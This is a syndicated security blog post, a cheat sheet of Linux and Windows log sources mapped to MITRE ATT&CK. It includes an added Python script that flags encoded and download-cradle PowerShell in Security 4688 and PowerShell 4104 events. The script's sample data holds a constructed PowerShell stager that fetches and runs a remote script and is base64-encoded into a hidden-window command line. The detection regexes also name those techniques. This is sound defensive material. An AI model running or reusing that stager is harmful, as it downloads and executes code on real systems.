Your Security Operations Cheat Sheet for Windows and Linux Logs (And How to Tie Them to the MITRE ATT&CK Framework)
Within the security operations center, visibility is everything. Being aware of the details of users, assets, known threats, and specific vulnerabilities present across security, network, server, application and database sources allows security operations teams to act quickly and decisively to address possible risks.
Here is where Linux and Windows event logs come in, providing that essential observability into the goings-on across your organization’s network and digital footprint. But it is not always easy for teams to know where they should be looking. That’s because your logs are likely capturing huge volumes of data. Knowing which events are indicative of something major and worthy of further investigation, like a security breach, isn’t always self-evident.
That is why Siemplify Solutions Engineer Ivan Ninichuck compiled the below cheat sheet of go-to Windows and Linux logs – and mapped them to key tactics and techniques of the MITRE ATT&CK framework. This will allow your security operations team to know which log files are critical for activities such as monitoring, auditing, analysis, threat hunting, and overall security program improvement.
Keep this list handy, especially if your SOC’s maturity level needs a little boost!
LINUX LOGS

Location | Description | MITRE ATT&CK (Sub)Technique
---|---|---
/var/log/messages (Debian/Ubuntu: /var/log/syslog) | Global system activity from the syslog daemon, including boot-time messages | 
/var/log/secure (Debian/Ubuntu: /var/log/auth.log) | Security-related events such as user logins, sudo and other root activity, and PAM output | T1078: Valid Accounts; T1110: Brute Force
/var/log/kern.log | Kernel messages: hardware, driver and module errors, warnings and events | 
/var/log/cron | Scheduled tasks: cron job executions and crontab edits (well suited to spotting persistence) | T1053.003: Scheduled Task/Job: Cron
/var/log/faillog | Failed login attempts (binary; read with the faillog command). Many current distributions no longer maintain it; failed logins then live in /var/log/btmp (read with lastb) and the auth log | T1110: Brute Force
/var/log/wtmp | All login and logout events (binary; read with last) | T1078: Valid Accounts
/var/log/audit/audit.log | auditd records (system calls, file access, authentication) designed to record security events for incident investigation | 

On systemd-based distributions the same messages also go to the journal (journalctl); hosts without rsyslog or syslog-ng installed log only there.
WINDOWS LOGS

Location | Description | MITRE ATT&CK (Sub)Technique
---|---|---
C:\Windows\System32\winevt\Logs\ (.evtx files; on pre-Vista systems, .evt files under C:\Windows\System32\config\) | Storage point for the Windows event logs, which cover everything from system and security logs to application and service logs. The rows below break them down into categories. In practice they are read through Event Viewer, Get-WinEvent or wevtutil rather than from the files directly. | Windows event logs can be used to investigate any MITRE ATT&CK technique applicable to the Windows OS.
Application Log | Any event logged by an application. | 
System Log | Events the operating system logs during both normal and abnormal operation, such as service starts and stops, driver loads and shutdowns. | 
PowerShell Log | Logs under Applications and Services Logs that record PowerShell activity: the classic Windows PowerShell log and Microsoft-Windows-PowerShell/Operational, where script block logging (Event ID 4104) captures the code actually executed, including the decoded content of -EncodedCommand payloads. Script block and module logging must be enabled by policy. | T1059.001: Command and Scripting Interpreter: PowerShell
Sysmon Log | Added under Applications and Services Logs (Microsoft-Windows-Sysmon/Operational) by installing the Sysinternals tool Sysmon. It records detailed security events beyond what the Security log offers, such as process creation with hashes and parent process (Event ID 1), network connections (3), driver and image loads (6, 7) and registry changes (12 to 14), filtered by its configuration file. | 
Security Log | Audited security events: successful and failed logons (4624/4625), account and group changes, process creation (4688), file deletions, registry changes and several others. Object access events (files, registry) and process command lines appear only if the corresponding audit policy is enabled. | T1078: Valid Accounts; T1110: Brute Force
Directory Service Log | If the Windows OS is a domain controller, Active Directory Domain Services events are located in this category. | 
DNS Server Log | If the Windows OS is acting as a DNS server, the service's events are kept under this section. Per-query logging, which is what you need to spot DNS tunnelling, requires enabling the DNS Server analytical (or debug) log. | T1071.004: Application Layer Protocol: DNS (and T1048: Exfiltration Over Alternative Protocol for DNS-based exfiltration)
File Replication Service Log | If the Windows OS is a domain controller, replication events for the legacy File Replication Service (FRS) are kept here; domains that have migrated SYSVOL to DFS Replication log to the DFS Replication log instead. | 
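As an added example (not part of the original post or of Siemplify's tooling), the Python script below triages the PowerShell and Security log entries described above once they have been exported as XML (the shape `wevtutil qe <log> /f:xml` or Get-WinEvent's ToXml() produce). It decodes a -EncodedCommand argument from a constructed Security event 4688, checks both the command line and the decoded script for common abuse indicators, and applies the same indicators to constructed 4104 script block text from Microsoft-Windows-PowerShell/Operational. The events, host, user, paths and stager URL are all constructed for the demo.

```python
"""Added example (not from the original post): triage of constructed Windows
event XML for PowerShell abuse. Decodes -EncodedCommand arguments from
Security event 4688 (process creation) and inspects script block text from
Microsoft-Windows-PowerShell/Operational event 4104. Hits map to T1059.001
(Command and Scripting Interpreter: PowerShell) and T1027 (Obfuscated Files
or Information)."""
import base64
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed stager. powershell.exe -EncodedCommand takes the base64 of the
# UTF-16LE bytes of the script, so the sample is built the same way.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/p.ps1')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16-le")).decode("ascii")

# Constructed events in the shape emitted by `wevtutil qe <log> /f:xml` or
# Get-WinEvent's ToXml(), wrapped in one root element. Host, user, paths made up.
EVENTS_XML = f"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4688</EventID>
    <Channel>Security</Channel><Computer>WKS01.corp.example</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">jdoe</Data>
    <Data Name="NewProcessName">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Data>
    <Data Name="CommandLine">powershell.exe -nop -w hidden -enc {_ENCODED}</Data>
    <Data Name="ParentProcessName">C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
    <Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>WKS01.corp.example</Computer></System>
  <EventData><Data Name="ScriptBlockText">{_STAGER}</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
    <Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>WKS01.corp.example</Computer></System>
  <EventData><Data Name="ScriptBlockText">Get-ChildItem C:\\Users\\jdoe\\Documents | Measure-Object</Data></EventData>
</Event>
</Events>"""

# PowerShell accepts any unambiguous prefix of -EncodedCommand (and -ec).
_ENC_FLAGS = "|".join("encodedcommand"[:i] for i in range(1, 15)) + "|ec"
ENCODED_FLAG = re.compile(rf"\s-(?:{_ENC_FLAGS})\s+([A-Za-z0-9+/=]+)", re.I)

# Indicator regexes applied to both the raw command line and the decoded script.
INDICATORS = [
    (re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I), "remote download"),
    (re.compile(r"FromBase64String", re.I), "nested base64"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), "profile bypass"),
]


def decode_encoded_command(cmdline):
    """Return the script passed via -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def indicators_in(text):
    return [label for rx, label in INDICATORS if rx.search(text)]


def triage(events_xml):
    """Return findings for 4688 and 4104 events that carry PowerShell abuse indicators."""
    findings = []
    for ev in ET.fromstring(events_xml).findall("e:Event", NS):
        event_id = ev.findtext("e:System/e:EventID", namespaces=NS)
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        if event_id == "4688":
            cmdline = data.get("CommandLine", "")
            decoded = decode_encoded_command(cmdline)
            hits = indicators_in(cmdline) + indicators_in(decoded or "")
            techniques = ["T1059.001"] if hits else []
            if decoded is not None:            # encoding itself is worth a flag
                hits.append("encoded command")
                techniques.append("T1027")
            if hits:
                findings.append({"event_id": event_id, "user": data.get("SubjectUserName"),
                                 "parent": data.get("ParentProcessName"), "decoded": decoded,
                                 "indicators": hits, "techniques": techniques})
        elif event_id == "4104":
            script = data.get("ScriptBlockText", "")
            hits = indicators_in(script)
            if hits:
                findings.append({"event_id": event_id, "script": script,
                                 "indicators": hits, "techniques": ["T1059.001"]})
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS_XML):
        print(finding)
```

Two caveats the sample glosses over: the CommandLine field in 4688 is only populated when "Include command line in process creation events" is enabled in audit policy, and 4104 only exists when script block logging is turned on. Where both are present, 4104 is the more reliable source, because it records the script after PowerShell has already decoded it, whereas the 4688 decoder here only handles the outermost -EncodedCommand layer; the parent process (WINWORD.EXE spawning powershell.exe) is recorded so the analyst can weigh it, not scored.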
Certain tools can help you collect, centralize and interpret the log data. SIEMs, for example, help to “connect the dots” about potential incidents by correlating events from these different sources, generating alerts for analysts about potentially malicious activity happening within the network.
It is that last step, generating alerts for analysts, that creates the need for something more. Handling alerts is manual, time-consuming and repetitive, and their sheer volume can overwhelm analysts, with predictable results: something important gets missed, or people burn out.
For maximum effectiveness, you can connect your SIEM (or other detection tools such as EDR, NDR, anti-phishing, DLP and CASBs) to a security orchestration, automation and response (SOAR) platform, which takes the alerts from there.
SOAR helps to streamline the management of security issues through automated playbooks, manage disparate detection tools through a single interface and coordinate responses to security incidents.
For our next post, we will look at some of the key cloud-related security logs (for example, Amazon Web Services (AWS) CloudWatch logs and Amazon Virtual Private Cloud Flow logs), that you must monitor.
Dan Kaplan is director of content at Siemplify.
The post Your Security Operations Cheat Sheet for Windows and Linux Logs (And How to Tie Them to the MITRE ATT&CK Framework) appeared first on Siemplify.
*** This is a Security Bloggers Network syndicated blog from Siemplify authored by Dan Kaplan. Read the original post at: https://www.siemplify.co/blog/your-security-operations-cheat-sheet-for-windows-and-linux-logs-and-how-to-tie-them-to-the-mitre-attck-framework/